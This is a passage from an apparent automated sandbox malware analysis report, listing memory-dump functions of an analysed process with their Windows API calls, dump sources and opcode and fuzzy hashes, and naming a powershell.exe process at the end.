                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 3176b163830fa5e761be74de56ab3fbbae01fdb1f7ce2df1ddaaa5844f66fcb9
                                                        • Instruction ID: 595ee93ad1c517958a93d629040b794e559c52f587852727ecb49e75c11ab8d3
                                                        • Opcode Fuzzy Hash: 3176b163830fa5e761be74de56ab3fbbae01fdb1f7ce2df1ddaaa5844f66fcb9
                                                        • Instruction Fuzzy Hash: E311CE72500300EFFB21DF51DC85FA6FBA8EF54720F04896AEE499A241C771A904CBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 05d9562c8557528828eb1bc626f580763cf634d5ce2f126a8f2450dec87d1f12
                                                        • Instruction ID: a30a7efa0b201985e19e28c55283af461de4d0a4c6bd1c319ee19ebd0ea4b5a1
                                                        • Opcode Fuzzy Hash: 05d9562c8557528828eb1bc626f580763cf634d5ce2f126a8f2450dec87d1f12
                                                        • Instruction Fuzzy Hash: DC118F715093C09FE7128B15DC54A62FFB4DF47654F0880DAEDC94F253D265A908DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: eaa87f9e36e22b2e0caf0936f6a7342249606528058df5219b9cd23e47be1b2b
                                                        • Instruction ID: 1f4cff1c8bd145fd4c944e021b09cf8258feee579a2022dccf53d29eebf18727
                                                        • Opcode Fuzzy Hash: eaa87f9e36e22b2e0caf0936f6a7342249606528058df5219b9cd23e47be1b2b
                                                        • Instruction Fuzzy Hash: 001191715093849FDB218F25DC45B96FFA4EF06220F0984EEED898B252D375A848CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 818566f6b3e5f0cf49a6fdde1dbef3e4caefe137065bec1f5a4ae7067967b6d7
                                                        • Instruction ID: fcea7fb278b66ed3fc7a0291ffee711eb4336eb5f6dd6dcbbff00dae53028e4d
                                                        • Opcode Fuzzy Hash: 818566f6b3e5f0cf49a6fdde1dbef3e4caefe137065bec1f5a4ae7067967b6d7
                                                        • Instruction Fuzzy Hash: D811C2755093C09FDB128B15DC95B52FFB4DF42220F0880EBED858B663D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 90d1ac002281e02754cf13fb7b25b25ff556051ad98ada1a8e3f4929d418e692
                                                        • Instruction ID: cdb616e55326e6227000038a5d792c45e847f3e686d17be9fcf65c0c2c843489
                                                        • Opcode Fuzzy Hash: 90d1ac002281e02754cf13fb7b25b25ff556051ad98ada1a8e3f4929d418e692
                                                        • Instruction Fuzzy Hash: 42113CB6600345DFEB60DF2ADC85B56FBA8EB04621F08846ADE4DCB642D674E504CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 7670dd85d33c092b83036dc33b4ff1777e42d326aa57edd249b482dd5cb6f99a
                                                        • Instruction ID: e01d8598d4bfca2db2fde46649cacfdb79bd6cf4ebe19bf5788632ddaae39f7f
                                                        • Opcode Fuzzy Hash: 7670dd85d33c092b83036dc33b4ff1777e42d326aa57edd249b482dd5cb6f99a
                                                        • Instruction Fuzzy Hash: 8211C1755097C09FD7128B15DC85A91BFB0EF07224F0980DBDD898F163D268A909CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0274092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: ed638f48c3dd645b66834fc00bffc0a3643f7b1bc66d3e0a2657d217e29c646a
                                                        • Instruction ID: bb949734ade86278f22f76bd013091c3cef1fac8e57784013e56cb7472a7fed8
                                                        • Opcode Fuzzy Hash: ed638f48c3dd645b66834fc00bffc0a3643f7b1bc66d3e0a2657d217e29c646a
                                                        • Instruction Fuzzy Hash: BB119D715093C09FE7128B25DC55B92BFB4EF07324F0981DADD884B263C365A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 02740819
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 8d08c9471256b82b551010ccea99a3d964be1e72dc54b33b3b02d720250b58a6
                                                        • Instruction ID: 79e057706568c99026efbf994014666052ed747222b277e1bde2ddd8bc4ae815
                                                        • Opcode Fuzzy Hash: 8d08c9471256b82b551010ccea99a3d964be1e72dc54b33b3b02d720250b58a6
                                                        • Instruction Fuzzy Hash: EA018071500744EFFB209F15DD86BA6FBACDF44720F1481AAEE499A241DB74A904CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 82aed497da4a1d3eab2f1c2c8af4c97e1e8f91022d57819eee41932835b24b81
                                                        • Instruction ID: 2c6f33606b2382ac65312f0b17b1140f1ce7dc33cbeb04277f418b34c0cc2d9b
                                                        • Opcode Fuzzy Hash: 82aed497da4a1d3eab2f1c2c8af4c97e1e8f91022d57819eee41932835b24b81
                                                        • Instruction Fuzzy Hash: 0911A175600700DFEB20DF55DC85B66FBA4EF04620F48C4AADD498B651D771E444CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 9d0689b09999a4f88149cfd25585a312870803c3c697d00c41877a03e5eb9bd1
                                                        • Instruction ID: 1c11990f36cd0ed7cf4cb9c6a6abea30967030e933f8e12b0524dd4d63be7b35
                                                        • Opcode Fuzzy Hash: 9d0689b09999a4f88149cfd25585a312870803c3c697d00c41877a03e5eb9bd1
                                                        • Instruction Fuzzy Hash: 3711C2B55093809FDB11CF55DC85B82FFA4EF02324F0980ABDD488F153D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 9ac016ae5312389d1624bfd1ab78efc9b13baa9caba3b5a7f4d86770bd522dcd
                                                        • Instruction ID: 807d8f7eb58041ef24533cede33b39d03a59ec6b9c41daf4294eda8f7092a710
                                                        • Opcode Fuzzy Hash: 9ac016ae5312389d1624bfd1ab78efc9b13baa9caba3b5a7f4d86770bd522dcd
                                                        • Instruction Fuzzy Hash: A9118E72500700DFEB61CF55DC45B62FFE4EF04211F0885AEDE898A612D371E918DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01CFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: a9bd5757c9d0a06f08c48d8dd97474796b9cd15d776a9ebab98f19b86b166785
                                                        • Instruction ID: 5d104cc39653875ab4dfb75a70c12ef9bef0ca2cc9c416908eeaaa9b1c0a63a1
                                                        • Opcode Fuzzy Hash: a9bd5757c9d0a06f08c48d8dd97474796b9cd15d776a9ebab98f19b86b166785
                                                        • Instruction Fuzzy Hash: C6017171900600ABE314DF16DC46B66FBB8FB84A60F14816AED089B741D235B915CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0274104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 4a84207a296a654e3b5219f8fd2992882e256c0c5df26643cf6b2be48cf7378e
                                                        • Instruction ID: 2b27694536151c4eecd1bf9925b8b43dce723df229ab9ed086cadce276a3b2a1
                                                        • Opcode Fuzzy Hash: 4a84207a296a654e3b5219f8fd2992882e256c0c5df26643cf6b2be48cf7378e
                                                        • Instruction Fuzzy Hash: 48017171900600ABE314DF16DC46B66FBB8FB84B60F14816AED099B741D335B915CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 0b23a0c46482ad98d733735a62c3237946d64e34bfad82fba449d1046341dca1
                                                        • Instruction ID: 8660800de4ea8d533dca9aa9891c23982400eedb2ae15b6ddf0e3d9fa73b2233
                                                        • Opcode Fuzzy Hash: 0b23a0c46482ad98d733735a62c3237946d64e34bfad82fba449d1046341dca1
                                                        • Instruction Fuzzy Hash: 07019E71600344CFEB14DF25DC8576AFBA8EB00220F0884AADE09CB642DB74E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 0f882aecb61e82bfdfd8437424d80cc9aeb268f52056378ab6df6725ec732bc5
                                                        • Instruction ID: af517ddd474518177a81e2e11552f83d2da6931910bebddb42d9acf001b0d5f7
                                                        • Opcode Fuzzy Hash: 0f882aecb61e82bfdfd8437424d80cc9aeb268f52056378ab6df6725ec732bc5
                                                        • Instruction Fuzzy Hash: 7001DF75600244DFEB61CF19DC857A5FBA4EF04620F08C4AEDE498B656D375E904CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: d4f3c9ed5df6ef9666a4f67dd44e683bf696e812cb820325e077c75679f65c35
                                                        • Instruction ID: 6b0a9f3fccb3365e21c033f6b345f7003dc3f12c32694dbfbcc91bead4bd15b8
                                                        • Opcode Fuzzy Hash: d4f3c9ed5df6ef9666a4f67dd44e683bf696e812cb820325e077c75679f65c35
                                                        • Instruction Fuzzy Hash: B201DF71600340DFEF20EF15DC857A5FBA4EF04624F48C4AADC498B642D775A844CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: bf4281052367a435187f1e4b017f1d26942036795489e7b570b135d65ba4213f
                                                        • Instruction ID: 2029b839ceffbe4fea2e84d6b36d4778f5f726ebd890a779288e83322249f47c
                                                        • Opcode Fuzzy Hash: bf4281052367a435187f1e4b017f1d26942036795489e7b570b135d65ba4213f
                                                        • Instruction Fuzzy Hash: E4016D71A00601ABE314DF16DC86B26FBB8FB89B20F14825AED085B741D275F915CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 2709cce3f1d46b445a0ca0b80d96d6295036fe5fdbff74d5a80142699c147312
                                                        • Instruction ID: da706c7c74588f90139a99be9a76f77eff21f355fee2ae52c7ed24efaef0cbcd
                                                        • Opcode Fuzzy Hash: 2709cce3f1d46b445a0ca0b80d96d6295036fe5fdbff74d5a80142699c147312
                                                        • Instruction Fuzzy Hash: BB018F71904340DFEB10DF15DC85B66FBA4EF01664F08C5AADD498F646D774E504CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: bfd21e92c7ce9fbed9a3d53756381639532c600c40b250f3140cd260e6b270e8
                                                        • Instruction ID: acc2bf9bff05ebab31f14d984e660c617d20e75fdc2c380d0280e5c1a0b1812e
                                                        • Opcode Fuzzy Hash: bfd21e92c7ce9fbed9a3d53756381639532c600c40b250f3140cd260e6b270e8
                                                        • Instruction Fuzzy Hash: 15016D71A00601ABE314DF16DC86B26FBB8FB89B20F14825AED085B741D275F915CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0274060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: b40f56bad0122f1aea8bb8281f78a9bdd577527f238c1faba76e7f4a4e3e83cf
                                                        • Instruction ID: 6e420885313975a3c894a6a2fcf1f77b384b8dfa67435426154c59985adee993
                                                        • Opcode Fuzzy Hash: b40f56bad0122f1aea8bb8281f78a9bdd577527f238c1faba76e7f4a4e3e83cf
                                                        • Instruction Fuzzy Hash: 3D01F475600740CFEB148F15D885761FBA0DF41720F08C0AADD4A8B752D774E804DEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 8a5f0444b0a40cc3c7c3beb42c53e12858fa3d94c5dec6372763d511b6cc5fe3
                                                        • Instruction ID: b1a1200cb98475536b0a2dfc3afdd8efbdcf8d830cdd131684f956002d4a7268
                                                        • Opcode Fuzzy Hash: 8a5f0444b0a40cc3c7c3beb42c53e12858fa3d94c5dec6372763d511b6cc5fe3
                                                        • Instruction Fuzzy Hash: 9E01DC71904344DFEB50DF5AEC89BA1FBA4EF00220F08C4AACE0D8F606D275E504CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02741116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 14bb039813bb2a92231df2e617a42c1a9f398d600c6d6300b1773a97fb45d1ed
                                                        • Instruction ID: 0900e7121618fa48240732d46938eaa6672efd90f2a2425d875b5346ad0ae64d
                                                        • Opcode Fuzzy Hash: 14bb039813bb2a92231df2e617a42c1a9f398d600c6d6300b1773a97fb45d1ed
                                                        • Instruction Fuzzy Hash: 8BF0AF35600740DFEB20EF05D885765FBA4EF05A21F48C1AADD4D4B312DB75A984CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: e7e6d7f55124b75e5d7d7585123ccc46acbe14767c3bc6cbfe4a5989c7e59394
                                                        • Instruction ID: 5938994ee1ad3bc0f2814beff95a4685306ee6afa51d2f3bb6a6cc627f805cf8
                                                        • Opcode Fuzzy Hash: e7e6d7f55124b75e5d7d7585123ccc46acbe14767c3bc6cbfe4a5989c7e59394
                                                        • Instruction Fuzzy Hash: CEF0CD35504740DFEB61DF0AD889765FBA0EF04B21F08C1AADE4D4B312D3B5E908CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0274096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 1feccc204607a414235ae8e8ac598af61ae0d09a36d39c47c9ec27f32e5e24ca
                                                        • Instruction ID: a50348c577415fcbd72dce7443bafbd2f633524790f77eef6e17b28b5cc1d899
                                                        • Opcode Fuzzy Hash: 1feccc204607a414235ae8e8ac598af61ae0d09a36d39c47c9ec27f32e5e24ca
                                                        • Instruction Fuzzy Hash: 8FF0CD35904740DFEB20DF16D889766FBA0EF15721F08C1AADE894B316D775A908CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 571dbb904a566f033b72511a68f5b60041548dc4229f2d11ab996a39f80d77b1
                                                        • Instruction ID: eadebc4e55934449cb548be9b67f6015af150e9c4fccd5b1bbf133533aa09eee
                                                        • Opcode Fuzzy Hash: 571dbb904a566f033b72511a68f5b60041548dc4229f2d11ab996a39f80d77b1
                                                        • Instruction Fuzzy Hash: 8FF0A931900744CFEB50DF0AD98A761FBA0EB04621F08C09ADE0D4B652D278EA08CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 3691454de3c59f1c9872d1a0f905cbf6023ee0c50d4182c1ef79e112e48631ce
                                                        • Instruction ID: e4ec9dc904e59f36ba0ce11654bcbbb0f081c38f011b0488a3e49ea69e114e1d
                                                        • Opcode Fuzzy Hash: 3691454de3c59f1c9872d1a0f905cbf6023ee0c50d4182c1ef79e112e48631ce
                                                        • Instruction Fuzzy Hash: 7A1191715093809FD712CB25DC45B92FFA4DF02220F0980EBED898B252D275A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 3e0eba149393c6aa6b6d77a5b63c0360b0959220d81dcf797ad2e871091302a6
                                                        • Instruction ID: 1e360cfb547decf7cce5fd222d46175b94b65aedc41dc474cc187d2bdba05130
                                                        • Opcode Fuzzy Hash: 3e0eba149393c6aa6b6d77a5b63c0360b0959220d81dcf797ad2e871091302a6
                                                        • Instruction Fuzzy Hash: D5018F75600680DFEB51DF1AD8857A6FBA4DF04220F08C4BEDD498B642D675E908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027607F7, Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167665040.0000000002760000.00000040.00000040.sdmp, Offset: 02760000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2737eed091795d9dc909fc25692a691002175ae0b4eefb32e089bbc1e895bc4b
                                                        • Instruction ID: 7c5ec3e0365346fa0e528b85629b9a175baee61cd8beb1448778ee2d8e90c561
                                                        • Opcode Fuzzy Hash: 2737eed091795d9dc909fc25692a691002175ae0b4eefb32e089bbc1e895bc4b
                                                        • Instruction Fuzzy Hash: 3D01DB75209780AFC7018B16EC41893FFB8DF4767070985EFEC898B212C225A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0276081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167665040.0000000002760000.00000040.00000040.sdmp, Offset: 02760000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0814d6ef153abd98b1450a97b3c3090f9842e1002a8a15f3135b4a13fc07754a
                                                        • Instruction ID: 6db64f78a7daafc787e6410166fe48fe8d17e868afb20804211270c16892a312
                                                        • Opcode Fuzzy Hash: 0814d6ef153abd98b1450a97b3c3090f9842e1002a8a15f3135b4a13fc07754a
                                                        • Instruction Fuzzy Hash: F1E092B66017008BD750DF0AFC41462F7A4EB84A30B18C17FDC4D8B700D235B904CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CF23F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159750717.0000000001CF2000.00000040.00000001.sdmp, Offset: 01CF2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93e40560d5fccf95c0f15c68a80b776cbe021ab706db2afd511308c24038a70d
                                                        • Instruction ID: 5a3be7c96f88813bf415b7ff19543472687bbab2faeb4fdf9350570e4ec6138c
                                                        • Opcode Fuzzy Hash: 93e40560d5fccf95c0f15c68a80b776cbe021ab706db2afd511308c24038a70d
                                                        • Instruction Fuzzy Hash: ECD05E79204A818FE7178A1CC1A4B953FA4AF55B04F4744FEE940CB6A3C7A8E681E210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CF23BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159750717.0000000001CF2000.00000040.00000001.sdmp, Offset: 01CF2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a723b817ab11d567af27d5f7743ca857327e971ec26539f384b32eb289bf0bce
                                                        • Instruction ID: 368a7100be013fc3781f381c6e7cbb75c3da8291052acd7b1111fae89e31e05f
                                                        • Opcode Fuzzy Hash: a723b817ab11d567af27d5f7743ca857327e971ec26539f384b32eb289bf0bce
                                                        • Instruction Fuzzy Hash: 9ED05E743006818FEB15CA1CC194F5977E8AF40B00F0644ECBD008B266C3A4E984C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2976 Parent PID: 2612 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 0049ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
